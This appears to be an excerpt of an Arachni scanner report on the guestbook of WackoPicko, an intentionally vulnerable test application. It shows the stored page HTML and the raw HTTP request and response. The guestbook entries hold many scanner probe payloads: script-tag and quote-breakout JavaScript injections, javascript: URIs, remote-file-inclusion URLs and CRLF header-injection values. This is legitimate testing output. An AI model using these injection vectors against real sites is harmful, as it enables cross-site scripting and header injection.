        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment">
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name"><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit">
</form>


</div>
       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
